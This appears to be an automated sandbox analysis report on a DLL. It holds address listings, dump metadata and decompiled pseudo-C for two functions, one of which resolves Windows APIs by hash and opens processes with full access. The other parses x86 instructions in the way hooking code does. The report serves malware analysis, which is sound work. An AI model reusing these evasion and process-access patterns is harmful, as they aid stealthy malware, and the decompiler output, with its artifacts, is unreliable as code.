0x6e9fa66c
0x6e9fa66f
0x6e9fa676
0x6e9fa678
0x6e9fa6a9
0x6e9fa6b8
0x6e9fa6ba
0x6e9fa6bc
0x6e9fa6da
0x6e9fa6dc
0x6e9fa6de
0x6e9fa6f1
0x6e9fa710
0x6e9fa716
0x6e9fa719
0x6e9fa730
0x6e9fa74c
0x6e9fa74e
0x6e9fa74e
0x6e9fa74e
0x6e9fa74e
0x6e9fa6de
0x00000000
0x6e9fa6bc
0x6e9fa67c
0x6e9fa67c
0x6e9fa67e
0x6e9fa68f
0x6e9fa691
0x6e9fa693
0x00000000
0x00000000
0x6e9fa69f
0x6e9fa6a0
0x6e9fa6a7
0x00000000
0x00000000
0x00000000
0x6e9fa6a7
0x6e9fa695
0x6e9fa698
0x00000000
0x00000000
0x6e9fa751
0x6e9fa751
0x6e9fa752
0x6e9fa752
0x00000000
0x6e9fa545
0x6e9fa547
0x6e9fa547
0x6e9fa549
0x6e9fa550
0x6e9fa55e
0x6e9fa560
0x6e9fa564
0x6e9fa568
0x6e9fa56a
0x6e9fa598
0x6e9fa59b
0x6e9fa5a0
0x6e9fa5a4
0x6e9fa5a9
0x6e9fa5b0
0x6e9fa5b5
0x6e9fa5b7
0x6e9fab7e
0x6e9fab8f
0x6e9fabaf
0x6e9fabb4
0x6e9fabb4
0x6e9fa5cd
0x6e9fa5d2
0x6e9fa5d2
0x6e9fa5d2
0x6e9fa5d2
0x6e9fa5e4
0x6e9fa5e6
0x6e9fa5e8
0x6e9fa5f9
0x6e9fa5f9
0x6e9fa5ff
0x6e9fa604
0x6e9fa608
0x6e9fa60e
0x6e9fa615
0x6e9fa61a
0x6e9fa61c
0x6e9fab32
0x6e9fab43
0x6e9fab64
0x6e9fab69
0x6e9fab69
0x6e9fa633
0x6e9fa638
0x6e9fa638
0x6e9fa638
0x6e9fa638
0x6e9fa63b
0x6e9fa63b
0x00000000
0x6e9fa63b
0x6e9fa56e
0x6e9fa56e
0x6e9fa570
0x6e9fa581
0x6e9fa583
0x6e9fa585
0x00000000
0x00000000
0x6e9fa591
0x6e9fa592
0x6e9fa596
0x00000000
0x00000000
0x00000000
0x6e9fa596
0x6e9fa587
0x6e9fa58a
0x00000000
0x00000000
0x6e9fa63c
0x6e9fa63c
0x6e9fa63d
0x6e9fa63d
0x00000000
0x6e9fa549
0x6e9fa53f

Strings

, xrefs: 6E9FAAF7

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 520b3767d1f3a4bab1c036847f47755a4ac23b584065059b633dc5ae4172a07e
Instruction ID: cc15d0a672b2015b2e5c72710c6245da5b8437da83be2766d2a4c426ccacfe61
Opcode Fuzzy Hash: 520b3767d1f3a4bab1c036847f47755a4ac23b584065059b633dc5ae4172a07e
Instruction Fuzzy Hash: 9D126171508301DFCB14DFA4C880AAEB7A9AFD5718F108E2DE999972A1DB70DD46CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E9F8428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6E9FB658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6E9FF4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6E9FF654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6EA02234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6E9FF654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6E9FF584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6E9FF584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6E9FF4BC(_t449 + 0x14, 0);
									_t180 = E6EA02908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6E9FB5C4(_t449 + 0x34);
										E6E9FB5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E9FF4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6E9FF4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6E9FB5C4(_t449 + 0x34);
										E6E9FB5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6E9FCA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6E9FC280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6E9FF828(_t449 + 0x14, E6E9FF4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6E9FF4BC(_t449 + 0x14, E6E9FF4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6EA03064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6E9FF828(_t449 + 0x40, E6E9FF4CC(_t449 + 0x3c) + 4);
											 *(E6E9FF4BC(_t449 + 0x40, E6E9FF4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6E9FCD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6E9FF4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6E9FF4BC(_t449 + 0x40, _t431 * 4);
												E6E9F8B58( *_t211, E6EA002B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6E9FCD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6E9FF4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6E9FF4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6E9FF4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6E9FF4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6E9FF4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6EA038F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E9FF4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6E9FF828( *(_t449 + 4), E6E9FF4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E9FF4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6E9FF4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6E9FF4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6E9FF4BC(_t322, _t430);
										E6EA038F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E9FF4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6E9FF828(_t322, E6E9FF4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E9FF828( *(_t449 + 4), E6E9FF4CC( *_t449) + 4);
								 *(E6E9FF4BC( *(_t449 + 4), E6E9FF4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6E9FF828(_t322, E6E9FF4CC(_t322) + 4);
								 *(E6E9FF4BC(_t322, E6E9FF4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6E9FF4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6EA03064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E9FF4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6E9FF828( *(_t449 + 4), E6E9FF4CC( *_t449) + 4);
										 *(E6E9FF4BC( *(_t449 + 4), E6E9FF4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E9FF4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6E9FF828( *((intOrPtr*)(_t449 + 0x74)), E6E9FF4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6E9FF4BC( *((intOrPtr*)(_t449 + 0x74)), E6E9FF4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6E9FF4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6E9FF4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6E9FF4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6E9FF4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6E9FF4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6E9FF4BC(_t430, _t443);
										E6EA038F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E9FF4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6E9FF828(_t430, E6E9FF4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6EA03064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6E9FF4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6E9FF4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6E9FF4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6E9FF4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6E9FF4BC( *(_t449 + 4), _t445);
										E6EA038F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E9FF4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6E9FF828( *(_t449 + 4), E6E9FF4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6E9FF4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6e9f8435
0x6e9f843b
0x6e9f843f
0x6e9f8443
0x6e9f844e
0x6e9f8452
0x6e9f8457
0x6e9f845f
0x6e9f846f
0x00000000
0x6e9f8471
0x6e9f8479
0x6e9f8480
0x6e9f8480
0x6e9f89d3
0x6e9f89d5
0x6e9f8a16
0x6e9f8a18
0x6e9f8a27
0x6e9f8a33
0x6e9f8a33
0x6e9f8a22
0x6e9f8a39
0x6e9f8a3e
0x00000000
0x6e9f8a3e
0x6e9f8a26
0x00000000
0x6e9f848a
0x6e9f848e
0x6e9f8491
0x6e9f8599
0x6e9f8599
0x6e9f859e
0x6e9f86c1
0x6e9f86c5
0x6e9f86ca
0x6e9f86ce
0x6e9f86d2
0x6e9f8808
0x6e9f880a
0x6e9f880e
0x6e9f8817
0x6e9f8822
0x6e9f8826
0x6e9f882f
0x6e9f8834
0x6e9f883a
0x6e9f883b
0x6e9f883f
0x6e9f8843
0x6e9f884a
0x6e9f884c
0x6e9f898c
0x6e9f899d
0x6e9f89a4
0x6e9f89ab
0x6e9f89ab
0x6e9f89ae
0x6e9f89b1
0x6e9f89b4
0x6e9f89ba
0x6e9f89c1
0x6e9f89c5
0x6e9f89ce
0x00000000
0x6e9f89ce
0x6e9f89bc
0x6e9f89bf
0x6e9f89d8
0x6e9f89f0
0x6e9f89f3
0x6e9f89f8
0x6e9f8a02
0x6e9f8a05
0x6e9f8a08
0x6e9f8a11
0x00000000
0x6e9f8a11
0x00000000
0x6e9f89bf
0x6e9f8854
0x6e9f8854
0x6e9f8856
0x6e9f885a
0x6e9f885f
0x6e9f8861
0x6e9f8865
0x6e9f8868
0x6e9f8870
0x6e9f8872
0x00000000
0x00000000
0x6e9f8889
0x6e9f88a4
0x6e9f88a6
0x6e9f88b4
0x6e9f88b9
0x6e9f88bb
0x6e9f88d8
0x6e9f88d8
0x6e9f88dc
0x6e9f88de
0x00000000
0x00000000
0x6e9f88e0
0x6e9f88e3
0x6e9f8904
0x6e9f8923
0x6e9f8929
0x6e9f892c
0x6e9f8931
0x6e9f8932
0x6e9f8939
0x00000000
0x00000000
0x6e9f8941
0x6e9f8941
0x6e9f8943
0x6e9f894f
0x6e9f895b
0x6e9f897d
0x6e9f8982
0x6e9f8983
0x6e9f8983
0x00000000
0x6e9f8943
0x00000000
0x6e9f88e3
0x6e9f88bd
0x6e9f88c3
0x6e9f88c5
0x6e9f88c6
0x6e9f88c7
0x6e9f88c8
0x6e9f88cc
0x6e9f88d0
0x6e9f88d2
0x6e9f88d3
0x6e9f88d4
0x6e9f88d6
0x00000000
0x00000000
0x00000000
0x6e9f88d6
0x6e9f88e9
0x00000000
0x6e9f88e9
0x6e9f86d8
0x6e9f86da
0x6e9f86dc
0x00000000
0x00000000
0x6e9f86e6
0x6e9f86e6
0x6e9f86e8
0x6e9f86eb
0x6e9f86ed
0x6e9f86f5
0x6e9f86fc
0x6e9f8700
0x6e9f8703
0x00000000
0x00000000
0x6e9f87ff
0x6e9f8800
0x6e9f8802
0x00000000
0x00000000
0x00000000
0x6e9f8802
0x6e9f8709
0x6e9f870c
0x6e9f8715
0x6e9f871a
0x6e9f871c
0x6e9f8728
0x6e9f872c
0x6e9f8731
0x6e9f8735
0x6e9f8b12
0x6e9f8b26
0x6e9f8b48
0x6e9f8b4d
0x6e9f8b4d
0x6e9f874b
0x6e9f8750
0x6e9f8754
0x6e9f8754
0x6e9f8754
0x6e9f8754
0x6e9f8759
0x6e9f875e
0x6e9f8760
0x6e9f8764
0x6e9f876b
0x6e9f8770
0x6e9f8772
0x6e9f8ad3
0x6e9f8ae2
0x6e9f8afb
0x6e9f8b00
0x6e9f8b00
0x6e9f8785
0x6e9f878a
0x6e9f878e
0x6e9f878e
0x6e9f878e
0x6e9f87a0
0x6e9f87c1
0x6e9f87c9
0x6e9f87d7
0x6e9f87f5
0x6e9f87fb
0x6e9f87fb
0x00000000
0x6e9f870c
0x6e9f85a4
0x6e9f85a4
0x6e9f85a6
0x6e9f85ad
0x6e9f85bb
0x6e9f85bd
0x6e9f85c1
0x6e9f85c3
0x6e9f85c5
0x6e9f8600
0x6e9f860f
0x6e9f8611
0x6e9f8613
0x6e9f8631
0x6e9f8633
0x6e9f8635
0x6e9f8647
0x6e9f8665
0x6e9f866e
0x6e9f8671
0x6e9f867f
0x6e9f8690
0x6e9f86ae
0x6e9f86b0
0x6e9f86b4
0x6e9f86b4
0x6e9f86b4
0x6e9f8635
0x00000000
0x6e9f8613
0x6e9f85cb
0x6e9f85cb
0x6e9f85d0
0x6e9f85d7
0x6e9f85e6
0x6e9f85ed
0x6e9f85ef
0x00000000
0x00000000
0x6e9f85fb
0x6e9f85fc
0x6e9f85fe
0x00000000
0x00000000
0x00000000
0x6e9f85fe
0x6e9f85f1
0x6e9f85f4
0x00000000
0x00000000
0x6e9f86b6
0x6e9f86b6
0x6e9f86b7
0x6e9f86b7
0x00000000
0x6e9f8497
0x6e9f8497
0x6e9f8497
0x6e9f8499
0x6e9f84a0
0x6e9f84ae
0x6e9f84b0
0x6e9f84b4
0x6e9f84b6
0x6e9f84e2
0x6e9f84e6
0x6e9f84eb
0x6e9f84f0
0x6e9f84f4
0x6e9f84f8
0x6e9f84ff
0x6e9f8504
0x6e9f8506
0x6e9f8a95
0x6e9f8aa4
0x6e9f8ac3
0x6e9f8ac8
0x6e9f8ac8
0x6e9f8519
0x6e9f851e
0x6e9f8522
0x6e9f8522
0x6e9f8522
0x6e9f8533
0x6e9f8535
0x6e9f8537
0x6e9f8548
0x6e9f8548
0x6e9f854d
0x6e9f8552
0x6e9f8556
0x6e9f855b
0x6e9f8562
0x6e9f8567
0x6e9f8569
0x6e9f8a57
0x6e9f8a63
0x6e9f8a7d
0x6e9f8a82
0x6e9f8a82
0x6e9f857f
0x6e9f8584
0x6e9f8588
0x6e9f8588
0x6e9f8588
0x6e9f8588
0x6e9f858b
0x6e9f858b
0x00000000
0x6e9f858b
0x6e9f84ba
0x6e9f84ba
0x6e9f84bc
0x6e9f84c8
0x6e9f84cf
0x6e9f84d1
0x00000000
0x00000000
0x6e9f84dd
0x6e9f84de
0x6e9f84e0
0x00000000
0x00000000
0x00000000
0x6e9f84e0
0x6e9f84d3
0x6e9f84d6
0x00000000
0x00000000
0x6e9f858c
0x6e9f8590
0x6e9f8591
0x6e9f8591
0x00000000
0x6e9f8499
0x6e9f8491

Strings

, xrefs: 6E9F8A1A

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
Instruction ID: 38c866f1001ee77bf6afed11b65a2d2ad07e07d40067ac805deef2a4bfe9f2be
Opcode Fuzzy Hash: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
Instruction Fuzzy Hash: 0B124D71208205DFCB64DFA5C994AAEB7A9AFD5708F104D2DE699873A1DB30DC06CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6EA09370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E6EA09370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6EA03698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L18:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L19;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L18;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L19;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L14:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L14;
						}
						if (_t250 == 0x66) goto L13;
						asm("adc [ebx+0x587567f8], eax");
					}
					L19:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
